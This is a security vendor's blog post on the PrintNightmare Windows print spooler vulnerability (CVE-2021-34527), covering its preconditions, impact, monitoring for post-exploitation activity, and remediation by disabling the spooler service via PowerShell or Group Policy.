Exploit Background
At the start of this month, a proof of concept for a Microsoft print spooler vulnerability rocked Windows admins, causing a clamor to contain the worst of the damage. This vulnerability is covered under CVE-2021-34527.

Originally beginning as a marked ‘low severity’ vulnerability, a proof of concept showed the ease at which this patched vulnerability would be exploited for an easy escalation of privileges. In order to exploit this vulnerability, an attacker need only find a system with:

  • An enabled Print Spooler service
  • Network connectivity
  • A password for another user/account on the system, including system accounts

Notably, this vulnerability can allow for lateral movement and obtainment of heightened privileges within the network. While this is concerning, its occurrence means that the attacker is already within the network and at a later phase in the kill chain.

Also of note is the fact that this vulnerability is limited to local privilege escalation only if the affected machines are patched. If they are not patched, the original remote code execution vulnerability is also still of concern.

There are now a multitude of proof of concepts in various languages. One such release is from user ‘anyu’ on Github, available here.

Impact
This vulnerability heightened to a critical severity on July 6th for several reasons:

  • Networked attack - this is a much faster and convenient vector than dealing with physical access
  • Low privileges required - even a guest account or system account (therefore an application) can take advantage
  • No user interaction necessary
  • No patch available

This being said, the impact of a privilege escalation of this sort could be very severe, allowing for covert access to private data without alarm. A privilege escalation of this type, spread far enough, can allow an attacker to push malicious software en masse to all networked machines or access administrator controls to further foothold in a network.

Automation Logic
The threat of privilege escalation typically can have a few larger connotations and uses to the attacker. In this case, an attacker may do one or multiple of the following:

  • Install/deploy additional accounts
  • Schedule chron jobs
  • Dump password hashes
  • Enable new services
  • Download and run new executables
  • Run malicious powershell scripts

Thankfully, existing LogicHub MDR detections already search for events of the above types, meaning that active exploitation of this vulnerability is already under direct monitoring and reporting. No additional infrastructure is required to ensure monitoring coverage against this CVE for MDR customers. (LogicHub SOAR customers who wish to implement these detections in their own environments should contact their customer service manager).

According to LogicHub Threat Detection Lead Anthony Morris, this may be one of the best ways to detect vulnerabilities of this type.

“The focus of my detection content is not to detect any of the 5,152 things that emerged in the last 3 months- of which this is just two of them... the focus of the detection content is to identify malicious actors acting on objectives.”

Considering the high count of CVEs that are added to monitoring daily, it makes sense to focus on the ‘what’ (that is, the events that occur) rather than the ‘how’ (specific CVEs and methodology). While knowing popular methods of action is important, a mountain of separate CVE detections, especially with this sort of vulnerability, may only complicate how active events are found. In the end, the largest concern of any monitoring team is the result of the actions on the objective.

Remediation
PrintNightmare targets users with an enabled Print Spooler service, so office environments and those who use printers most often (or even the Print to PDF feature) should take extra care as they cannot disable the service. These machines should be carefully monitored and their networked connections limited. The following methods are used to disable Print Spooler via GPO or Powershell on a single machine:

Powershell Stop-Service -Name Spooler -Force Set-Service -Name Spooler -StartupType Disabled

GPO Adjust under “Policies/Windows Settings/Security Settings/System Services/Print Spooler”

All administrators should also ensure that those who do not need Print Spooler should have it completely turned off, and that all roles and users follow the ‘least privilege’ access ideology. Limitations should be placed on the access control list in the ‘System32/spool/drivers’ directory, given that no other restrictions are possible.

The PrintNightmare vulnerability has no known full remediation and is of foremost concern due to active exploitation in the wild.

Recommended Sources
Afwu. “Afwu/PrintNightmare.” GitHub, 2021, github.com/afwu/PrintNightmare .

Hammond, John. “Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution.” Huntress, 2021, www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution.

Naraine, Ryan. “Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure.” SecurityWeek, 2021, www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure.

Sandbu, Marius. “PrintNightmare – CVE-2021-1675.” Marius Sandbu (Personal Portfolio), 6 July 2021, webcache.googleusercontent.com/search?q=cache%3AMi7jr9K3R6UJ%3Ahttps%3A%2F%2Fmsandbu.org%2Fprintnightmare-cve-2021-1675%2F%2B&cd=2&hl=en&ct=clnk&gl=us.

“Security Update Guide - CVE-2021-34527.” Microsoft Security Response Center, 2021, msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.